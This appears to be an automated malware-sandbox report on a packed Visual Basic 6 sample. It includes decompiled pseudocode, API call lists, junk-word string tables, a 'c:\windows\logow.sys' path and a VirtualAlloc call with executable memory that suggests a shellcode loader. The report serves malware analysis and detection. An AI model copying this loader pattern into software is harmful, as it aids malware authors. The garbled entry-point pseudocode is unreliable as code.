__vbaAryDestruct.MSVBVM60(00000000,?,00410C32), ref: 00410BCD
__vbaFreeObj.MSVBVM60(00000000,?,00410C32), ref: 00410BD5
__vbaFreeObj.MSVBVM60(00000000,?,00410C32), ref: 00410BDD
__vbaFreeObj.MSVBVM60(00000000,?,00410C32), ref: 00410BE5
__vbaFreeStr.MSVBVM60(00000000,?,00410C32), ref: 00410BED
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,00410C32), ref: 00410BF8
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,00410C32), ref: 00410C00
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,00410C32), ref: 00410C0B
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,00410C32), ref: 00410C16
__vbaFreeObj.MSVBVM60(00000000,?,00000000,?,00410C32), ref: 00410C21
__vbaFreeObj.MSVBVM60(00000000,?,00000000,?,00410C32), ref: 00410C2C

Strings

refractures, xrefs: 004105F9
moderskabernes, xrefs: 0040F329
Moaria, xrefs: 0040F81D
Circuted, xrefs: 0040FE32
Kummerfuld, xrefs: 0040F0F6
Turns5, xrefs: 00410250
Bernicia9, xrefs: 0040F56D
vehefte, xrefs: 00410803
KLARLG, xrefs: 0040F32E
String, xrefs: 0040F000
Skamsttter8, xrefs: 0040FFA5
R8RKPuezMDYUe6qnGrDitDuDZFS86, xrefs: 0040FBD1
Frdigbyggende, xrefs: 00410700
Firsaarsfdselsdage, xrefs: 0040EFC1
21:21:21, xrefs: 0041007C
nN, xrefs: 0040FE22
isogamous, xrefs: 0041003B
Hemathidrosis8, xrefs: 0040FBFE
p@, xrefs: 004106CA, 00410BC7, 00410BCA
Underskriftsindsamling, xrefs: 0040FB6B
dwell, xrefs: 00410A36
tricuspid, xrefs: 00410808
., xrefs: 00410153
Rebalance, xrefs: 0040FC31
2:2:2, xrefs: 0040F6ED
Tinsmithing1, xrefs: 004101FC
bediapers, xrefs: 0041020C
Outpushed1, xrefs: 0041059A
bothsidedness, xrefs: 0040F8A4
Elicits5, xrefs: 00410226
POCOSIN, xrefs: 0040FC21
Flavic7, xrefs: 004106FB
Lezannes, xrefs: 0040F8D8
Totalization, xrefs: 0040F440
b, xrefs: 00410B01
UULjaijLMUuw190, xrefs: 0040EF2D
, xrefs: 004109BC
delbetnkning, xrefs: 0040FC59
10/10/10, xrefs: 0040F600

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Chkstk$MoveNew2$Copy$List$Late$#556#716CallDestruct$#516#544#547#554#568#569#571#572#574#588#591#606#607#612#632#675#687#692#697#698AddrefBstrDateErrorFileOpen
String ID: $.$10/10/10$21:21:21$2:2:2$Bernicia9$Circuted$Elicits5$Firsaarsfdselsdage$Flavic7$Frdigbyggende$Hemathidrosis8$KLARLG$Kummerfuld$Lezannes$Moaria$Outpushed1$POCOSIN$R8RKPuezMDYUe6qnGrDitDuDZFS86$Rebalance$Skamsttter8$String$Tinsmithing1$Totalization$Turns5$UULjaijLMUuw190$Underskriftsindsamling$b$bediapers$bothsidedness$delbetnkning$dwell$isogamous$moderskabernes$nN$p@$refractures$tricuspid$vehefte
API String ID: 3371916064-2187405810
Opcode ID: e8726140a65afd256b346a23932a57b7c21e588b97bbb0e236e69010624a2c6b
Instruction ID: 9ea5081c8de213be91a522b40c7b32f3584039c9c578afee8a6c3b98d5b5efa4
Opcode Fuzzy Hash: e8726140a65afd256b346a23932a57b7c21e588b97bbb0e236e69010624a2c6b
Instruction Fuzzy Hash: 66F21670901228AFDB61DF61CC49BDDB7B4AF04304F5085EAE509BB1A1DBB95BC88F58

Uniqueness

Uniqueness Score: -1.00%

Function 00410C51, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00410C51(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed char _v104;
				intOrPtr* _v108;
				signed int _v112;
				char* _t76;
				signed char _t77;
				signed int _t78;
				char* _t82;
				signed int _t89;
				signed int _t94;
				char* _t98;
				intOrPtr _t120;

				_push(0x401486);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t120;
				_push(0x5c);
				L00401480();
				_v12 = _t120;
				_v8 = 0x4013c0;
				_v60 = L"11/11/11";
				_v68 = 8;
				L0040167E();
				_t76 =  &_v52;
				_push(_t76); // executed
				L00401588(); // executed
				_v72 =  ~(0 | _t76 != 0x0000ffff);
				L00401696();
				_t77 = _v72;
				if(_t77 != 0) {
					_t94 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
					asm("fclex");
					_v72 = _t94;
					if(_v72 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40da14);
						_push(_a4);
						_push(_v72);
						L004016D8();
						_v96 = _t94;
					}
					if( *0x41331c != 0) {
						_v100 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v100 = 0x41331c;
					}
					_v76 =  *_v100;
					_v88 = _v32;
					_v32 = _v32 & 0x00000000;
					_t98 =  &_v36;
					L004016BA();
					_t77 =  *((intOrPtr*)( *_v76 + 0x40))(_v76, _t98, _t98, _v88, L"EYESHIELD");
					asm("fclex");
					_v80 = _t77;
					if(_v80 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40dddc);
						_push(_v76);
						_push(_v80);
						L004016D8();
						_v104 = _t77;
					}
					L004016C0();
				}
				_push(0x40dea4);
				L00401582();
				_t78 = _t77 & 0x000000ff;
				if(_t78 != 0x61) {
					L0040157C();
				}
				_push(0x40de98);
				L0040166C();
				_push(_t78);
				L00401576();
				L0040168A();
				_push(_t78);
				_push(0x40dea4);
				L00401690();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t78));
				L004016C6();
				_t82 = _v72;
				if(_t82 != 0) {
					if( *0x41331c != 0) {
						_v108 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v108 = 0x41331c;
					}
					_v72 =  *_v108;
					_v60 = 0xd8;
					_v68 = 2;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t89 =  *((intOrPtr*)( *_v72 + 0x34))(_v72, 0x10, 0x3389,  &_v32);
					asm("fclex");
					_v76 = _t89;
					if(_v76 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x34);
						_push(0x40dddc);
						_push(_v72);
						_push(_v76);
						L004016D8();
						_v112 = _t89;
					}
					_v92 = _v32;
					_v32 = _v32 & 0x00000000;
					_push(_v92);
					_t82 =  &_v24;
					_push(_t82);
					L004016BA();
				}
				_push(0x410eb3);
				L004016C0();
				return _t82;
			}

0x00410c56
0x00410c61
0x00410c62
0x00410c69
0x00410c6c
0x00410c74
0x00410c77
0x00410c7e
0x00410c85
0x00410c92
0x00410c97
0x00410c9a
0x00410c9b
0x00410cab
0x00410cb2
0x00410cb7
0x00410cbd
0x00410ccf
0x00410cd5
0x00410cd7
0x00410cde
0x00410cfa
0x00410ce0
0x00410ce0
0x00410ce5
0x00410cea
0x00410ced
0x00410cf0
0x00410cf5
0x00410cf5
0x00410d05
0x00410d1f
0x00410d07
0x00410d07
0x00410d0c
0x00410d11
0x00410d16
0x00410d16
0x00410d2b
0x00410d31
0x00410d34
0x00410d40
0x00410d44
0x00410d52
0x00410d55
0x00410d57
0x00410d5e
0x00410d77
0x00410d60
0x00410d60
0x00410d62
0x00410d67
0x00410d6a
0x00410d6d
0x00410d72
0x00410d72
0x00410d7e
0x00410d7e
0x00410d83
0x00410d88
0x00410d8d
0x00410d95
0x00410d97
0x00410d97
0x00410d9c
0x00410da1
0x00410da6
0x00410da7
0x00410db1
0x00410db6
0x00410db7
0x00410dbc
0x00410dc3
0x00410dc9
0x00410dd0
0x00410dd5
0x00410ddb
0x00410de8
0x00410e02
0x00410dea
0x00410dea
0x00410def
0x00410df4
0x00410df9
0x00410df9
0x00410e0e
0x00410e11
0x00410e18
0x00410e2b
0x00410e35
0x00410e36
0x00410e37
0x00410e38
0x00410e41
0x00410e44
0x00410e46
0x00410e4d
0x00410e66
0x00410e4f
0x00410e4f
0x00410e51
0x00410e56
0x00410e59
0x00410e5c
0x00410e61
0x00410e61
0x00410e6d
0x00410e70
0x00410e74
0x00410e77
0x00410e7a
0x00410e7b
0x00410e7b
0x00410e80
0x00410ead
0x00410eb2

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00410C6C
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 00410C92
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 00410C9B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 00410CB2
__vbaHresultCheckObj.MSVBVM60(?,?,0040DA14,00000160), ref: 00410CF0
__vbaNew2.MSVBVM60(0040DDEC,0041331C), ref: 00410D11
__vbaObjSet.MSVBVM60(?,?,EYESHIELD), ref: 00410D44
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000040), ref: 00410D6D
__vbaFreeObj.MSVBVM60(00000000,?,0040DDDC,00000040), ref: 00410D7E
#693.MSVBVM60(0040DEA4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 00410D88
__vbaEnd.MSVBVM60(0040DEA4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 00410D97
__vbaI4Str.MSVBVM60(0040DE98,0040DEA4,?), ref: 00410DA1
#537.MSVBVM60(00000000,0040DE98,0040DEA4,?), ref: 00410DA7
__vbaStrMove.MSVBVM60(00000000,0040DE98,0040DEA4,?), ref: 00410DB1
__vbaStrCmp.MSVBVM60(0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410DBC
__vbaFreeStr.MSVBVM60(0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410DD0
__vbaNew2.MSVBVM60(0040DDEC,0041331C,0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410DF4
__vbaChkstk.MSVBVM60(00003389,?,?,?,?,?,0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410E2B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000034,?,?,?,?,0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410E5C
__vbaObjSet.MSVBVM60(?,?,?,?,?,?,0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410E7B
__vbaFreeObj.MSVBVM60(00410EB3,0040DEA4,00000000,00000000,0040DE98,0040DEA4,?), ref: 00410EAD

Strings

11/11/11, xrefs: 00410C7E
EYESHIELD, xrefs: 00410D38

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#537#557#693Move
String ID: 11/11/11$EYESHIELD
API String ID: 3078397079-3163467159
Opcode ID: 19b9972c44a233828c5759f6abd07866092b64dbd5529638ea960a1f8f2a0469
Instruction ID: 94119d229ef928b7b7e8786c21b1cee559de7c4f36dda36733150a3cf33e4f07
Opcode Fuzzy Hash: 19b9972c44a233828c5759f6abd07866092b64dbd5529638ea960a1f8f2a0469
Instruction Fuzzy Hash: E4610970D10209AFDF10EFE6C846BEEBBB4AF04705F14442AF405BB1A1DBB95986CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB44, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040EB44(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v32;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed int _v68;
				char* _v72;
				signed int _v76;
				signed int _v80;
				void* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _t124;
				signed int _t129;
				char* _t130;
				char* _t131;
				signed int _t135;
				signed int _t141;
				signed int _t147;
				char* _t149;
				signed int _t152;
				void* _t161;
				void* _t163;
				intOrPtr _t164;

				_t164 = _t163 - 0xc;
				 *[fs:0x0] = _t164;
				L00401480();
				_v16 = _t164;
				_v12 = 0x4011b0;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x401486, _t161);
				if( *0x41331c != 0) {
					_v108 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40ddec);
					L004016DE();
					_v108 = 0x41331c;
				}
				_v76 =  *_v108;
				_t124 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t124;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40dddc);
					_push(_v76);
					_push(_v80);
					L004016D8();
					_v112 = _t124;
				}
				_v84 = _v40;
				_t129 =  *((intOrPtr*)( *_v84 + 0x100))(_v84,  &_v68);
				asm("fclex");
				_v88 = _t129;
				if(_v88 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x40ddfc);
					_push(_v84);
					_push(_v88);
					L004016D8();
					_v116 = _t129;
				}
				_push(0x10);
				_push(0xc8);
				_push(0x140);
				_push(0);
				_push(L"c:\\windows\\logow.sys");
				_t130 =  &_v36;
				_push(_t130);
				L004016D2();
				_push(_t130);
				_push(_v68);
				E0040DBC0(); // executed
				_v72 = _t130;
				L004016CC();
				_t131 = _v72;
				_v32 = _t131;
				L004016C6();
				L004016C0();
				if(_v32 != 0) {
					_t135 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
					asm("fclex");
					_v76 = _t135;
					if(_v76 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40da14);
						_push(_a4);
						_push(_v76);
						L004016D8();
						_v120 = _t135;
					}
					_push(_v68);
					E0040DC50();
					L004016CC();
					E0040DCBC();
					L004016CC();
					_push(_v32);
					_push(2);
					E0040DD08();
					L004016CC();
					_push(2);
					E0040DD5C();
					_v68 = _t135;
					L004016CC();
					E0040DC08();
					L004016CC();
					if( *0x41331c != 0) {
						_v124 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v124 = 0x41331c;
					}
					_v76 =  *_v124;
					_t141 =  *((intOrPtr*)( *_v76 + 0x1c))(_v76,  &_v40);
					asm("fclex");
					_v80 = _t141;
					if(_v80 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v76);
						_push(_v80);
						L004016D8();
						_v128 = _t141;
					}
					_v84 = _v40;
					_v56 = 2;
					_v64 = 3;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t147 =  *((intOrPtr*)( *_v84 + 0x54))(_v84, 0x10,  &_v44);
					asm("fclex");
					_v88 = _t147;
					if(_v88 >= 0) {
						_v132 = _v132 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x40de3c);
						_push(_v84);
						_push(_v88);
						L004016D8();
						_v132 = _t147;
					}
					_v104 = _v44;
					_v44 = _v44 & 0x00000000;
					_t149 =  &_v48;
					L004016BA();
					_t152 =  *((intOrPtr*)( *_a4 + 0x154))(_a4, _t149, _t149, _v104);
					asm("fclex");
					_v92 = _t152;
					if(_v92 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x154);
						_push(0x40da14);
						_push(_a4);
						_push(_v92);
						L004016D8();
						_v136 = _t152;
					}
					_push( &_v48);
					_t131 =  &_v40;
					_push(_t131);
					_push(2);
					L004016B4();
				}
				_v8 = 0;
				_push(0x40ee4a);
				return _t131;
			}

0x0040eb47
0x0040eb56
0x0040eb60
0x0040eb68
0x0040eb6b
0x0040eb78
0x0040eb81
0x0040eb8c
0x0040eb96
0x0040ebb0
0x0040eb98
0x0040eb98
0x0040eb9d
0x0040eba2
0x0040eba7
0x0040eba7
0x0040ebbc
0x0040ebcb
0x0040ebce
0x0040ebd0
0x0040ebd7
0x0040ebf0
0x0040ebd9
0x0040ebd9
0x0040ebdb
0x0040ebe0
0x0040ebe3
0x0040ebe6
0x0040ebeb
0x0040ebeb
0x0040ebf7
0x0040ec06
0x0040ec0c
0x0040ec0e
0x0040ec15
0x0040ec31
0x0040ec17
0x0040ec17
0x0040ec1c
0x0040ec21
0x0040ec24
0x0040ec27
0x0040ec2c
0x0040ec2c
0x0040ec35
0x0040ec37
0x0040ec3c
0x0040ec41
0x0040ec43
0x0040ec48
0x0040ec4b
0x0040ec4c
0x0040ec51
0x0040ec52
0x0040ec55
0x0040ec5a
0x0040ec5d
0x0040ec62
0x0040ec65
0x0040ec6b
0x0040ec73
0x0040ec7c
0x0040ec8f
0x0040ec92
0x0040ec94
0x0040ec9b
0x0040ecb4
0x0040ec9d
0x0040ec9d
0x0040ec9f
0x0040eca4
0x0040eca7
0x0040ecaa
0x0040ecaf
0x0040ecaf
0x0040ecb8
0x0040ecbb
0x0040ecc0
0x0040ecc5
0x0040ecca
0x0040eccf
0x0040ecd2
0x0040ecd4
0x0040ecd9
0x0040ecde
0x0040ece0
0x0040ece5
0x0040ece8
0x0040eced
0x0040ecf2
0x0040ecfe
0x0040ed18
0x0040ed00
0x0040ed00
0x0040ed05
0x0040ed0a
0x0040ed0f
0x0040ed0f
0x0040ed24
0x0040ed33
0x0040ed36
0x0040ed38
0x0040ed3f
0x0040ed58
0x0040ed41
0x0040ed41
0x0040ed43
0x0040ed48
0x0040ed4b
0x0040ed4e
0x0040ed53
0x0040ed53
0x0040ed5f
0x0040ed62
0x0040ed69
0x0040ed77
0x0040ed81
0x0040ed82
0x0040ed83
0x0040ed84
0x0040ed8d
0x0040ed90
0x0040ed92
0x0040ed99
0x0040edb2
0x0040ed9b
0x0040ed9b
0x0040ed9d
0x0040eda2
0x0040eda5
0x0040eda8
0x0040edad
0x0040edad
0x0040edb9
0x0040edbc
0x0040edc3
0x0040edc7
0x0040edd5
0x0040eddb
0x0040eddd
0x0040ede4
0x0040ee03
0x0040ede6
0x0040ede6
0x0040edeb
0x0040edf0
0x0040edf3
0x0040edf6
0x0040edfb
0x0040edfb
0x0040ee0d
0x0040ee0e
0x0040ee11
0x0040ee12
0x0040ee14
0x0040ee19
0x0040ee1c
0x0040ee23
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 0040EB60
__vbaNew2.MSVBVM60(0040DDEC,0041331C,?,?,?,?,00401486), ref: 0040EBA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000014), ref: 0040EBE6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDFC,00000100), ref: 0040EC27
__vbaStrToAnsi.MSVBVM60(?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040EC4C
__vbaSetSystemError.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040EC5D
__vbaFreeStr.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040EC6B
__vbaFreeObj.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040EC73
__vbaHresultCheckObj.MSVBVM60(00000000,004011B0,0040DA14,00000058), ref: 0040ECAA
__vbaSetSystemError.MSVBVM60(?), ref: 0040ECC0
__vbaSetSystemError.MSVBVM60(?), ref: 0040ECCA
__vbaSetSystemError.MSVBVM60(00000002,00000000,?), ref: 0040ECD9
__vbaSetSystemError.MSVBVM60(00000002,00000002,00000000,?), ref: 0040ECE8
__vbaSetSystemError.MSVBVM60(00000002,00000002,00000000,?), ref: 0040ECF2
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00000002,00000002,00000000,?), ref: 0040ED0A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DDDC,0000001C), ref: 0040ED4E
__vbaChkstk.MSVBVM60(?), ref: 0040ED77
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,00000054), ref: 0040EDA8
__vbaObjSet.MSVBVM60(?,?), ref: 0040EDC7
__vbaHresultCheckObj.MSVBVM60(00000000,004011B0,0040DA14,00000154), ref: 0040EDF6
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040EE14

Strings

c:\windows\logow.sys, xrefs: 0040EC43

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckErrorHresultSystem$Free$ChkstkNew2$AnsiList
String ID: c:\windows\logow.sys
API String ID: 1859893698-110338818
Opcode ID: e5eb078e82e583de8f40b0e1349a8f0df976066c2c38136d1b4a559256ba0bb9
Instruction ID: d41c5236626f4b0b92ddfd537d106f28c4844d2e4c3de9ddc02708752e6c12fb
Opcode Fuzzy Hash: e5eb078e82e583de8f40b0e1349a8f0df976066c2c38136d1b4a559256ba0bb9
Instruction Fuzzy Hash: 6D91C271D00208EFDF10EFE6C845BDDBBB4AF08305F24442AE505BB2A1C7B999999F59

Uniqueness

Uniqueness Score: -1.00%

Function 004016FC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 65%

			_entry_(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _t69;
				signed char _t71;
				signed char _t72;
				signed int _t99;
				signed char _t113;
				intOrPtr* _t114;
				void* _t122;
				void* _t129;
				signed int* _t130;
				signed char _t131;
				void* _t132;
				signed int _t135;
				intOrPtr _t140;
				void* _t162;

				_t122 = __edi;
				_push("VB5!6&*"); // executed
				L004016F6(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t69 = __eax - 1;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				_t113 = __edx + _t69;
				_push(_t69);
				asm("invalid");
				_t130 = _t129 - 1;
				_t99 = __ebx + _t69;
				_t71 = _t131;
				_t132 = _t69 - 1;
				_t162 = __fp0 -  *((intOrPtr*)(__ecx + 0x33));
				asm("aaa");
				asm("int 0x9");
				 *_t71 =  *_t71 + _t71;
				 *_t71 =  *_t71 + _t71;
				 *_t71 =  *_t71 + _t71;
				 *_t71 =  *_t71 + _t71;
				_t72 = _t71;
				 *_t72 =  *_t72 + _t72;
				_t124 = __esi - 1;
				_t135 = _t124;
				asm("outsd");
				asm("outsb");
				if(_t135 >= 0) {
					if(_t135 < 0) {
						L6:
						 *_t72 =  *_t72 + _t72;
						_t9 = _t124 + _t124 * 4;
						 *_t9 =  *((intOrPtr*)(_t124 + _t124 * 4)) + _t113;
						_t140 =  *_t9;
					} else {
						asm("gs outsb");
						if(_t135 != 0) {
							asm("popad");
							asm("insb");
							asm("insb");
							if (_t135 >= 0) goto L4;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 ^ _t72;
							_t113 = _t113 |  *_t130;
							_t72 = _t72 ^ 0x00000092;
							asm("popad");
							asm("les ebp, [edi+0x55fcba46]");
							asm("iretd");
							asm("jecxz 0xffffff8a");
							_push(ss);
							_t132 = _t132 - 1 + 1;
							asm("adc al, 0x7f");
							 *0x4069725A =  *((intOrPtr*)(0x4069725a)) + _t72;
							asm("cdq");
							asm("adc eax, 0x52cd67ed");
							_t99 = _t99 ^  *0xFFFFFFFFB711CF66;
							asm("cdq");
							asm("iretw");
							asm("adc [edi+0xaa000c], esi");
							asm("pushad");
							asm("rcl dword [ebx], cl");
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							 *_t72 =  *_t72 + _t72;
							goto L6;
						}
					}
				}
				_t114 = 0;
				 *((intOrPtr*)(_t99 - 0x4c)) =  *((intOrPtr*)(_t99 - 0x4c)) + _t72;
				 *_t72 =  *_t72 + _t72;
				 *0 =  *0;
				 *((intOrPtr*)(_t122 + 0x75)) =  *((intOrPtr*)(_t122 + 0x75)) + _t72;
				asm("insb");
			}

0x004016fc
0x004016fc
0x00401701
0x00401706
0x00401708
0x0040170a
0x0040170c
0x0040170e
0x00401710
0x00401711
0x00401713
0x00401715
0x00401717
0x00401719
0x0040171a
0x0040171c
0x0040171d
0x00401720
0x00401720
0x00401721
0x00401724
0x00401725
0x0040172c
0x0040172e
0x00401730
0x00401732
0x00401734
0x00401736
0x00401738
0x00401738
0x00401739
0x0040173a
0x0040173b
0x0040173e
0x004017aa
0x004017aa
0x004017ac
0x004017ac
0x004017ac
0x00401741
0x00401741
0x00401743
0x00401745
0x00401746
0x00401747
0x00401748
0x0040174a
0x0040174c
0x0040174e
0x00401750
0x00401752
0x00401756
0x00401758
0x0040175b
0x0040175d
0x0040175e
0x00401764
0x00401765
0x00401767
0x00401768
0x00401769
0x0040176b
0x00401773
0x00401774
0x0040177c
0x0040177d
0x0040177e
0x00401780
0x00401786
0x00401787
0x0040178d
0x0040178f
0x00401791
0x00401793
0x00401795
0x00401797
0x00401799
0x0040179b
0x0040179d
0x0040179f
0x004017a1
0x004017a3
0x004017a5
0x004017a7
0x004017a9
0x00000000
0x004017a9
0x00401743
0x0040173e
0x004017ae
0x004017b0
0x004017b3
0x004017b5
0x004017b7
0x004017ba

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401701

Strings

VB5!6&*, xrefs: 004016FC

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 5c9fd51887ab5187f037f11687a220307f5a812cab2773e77784052fe3a3b81c
Instruction ID: 258cd360ce67db68bc240126217be212f613a0709f228e0832bd3f266a6f9941
Opcode Fuzzy Hash: 5c9fd51887ab5187f037f11687a220307f5a812cab2773e77784052fe3a3b81c
Instruction Fuzzy Hash: E5D0B64108E3C01EC30713748C668422F34490326031B00E79480DF0E3C05D094E9337

Uniqueness

Uniqueness Score: -1.00%

Function 0040A983, Relevance: 1.7, APIs: 1, Instructions: 418memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c266860307a4285f9311308018263922f1e39bc4938ef0815e35e009d5de9e78
Instruction ID: d2524293e4cb1d2bd26fdd2ede4b3e31323fdd37062c7908b836fe36d98f86c5
Opcode Fuzzy Hash: c266860307a4285f9311308018263922f1e39bc4938ef0815e35e009d5de9e78
Instruction Fuzzy Hash: 0F91C041E6A34685EF732030C9D079D6681CF56781F318F37D866F58D2BA2F85CA198B

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA12, Relevance: 1.6, APIs: 1, Instructions: 397memoryCOMMON

Download Yara Rule

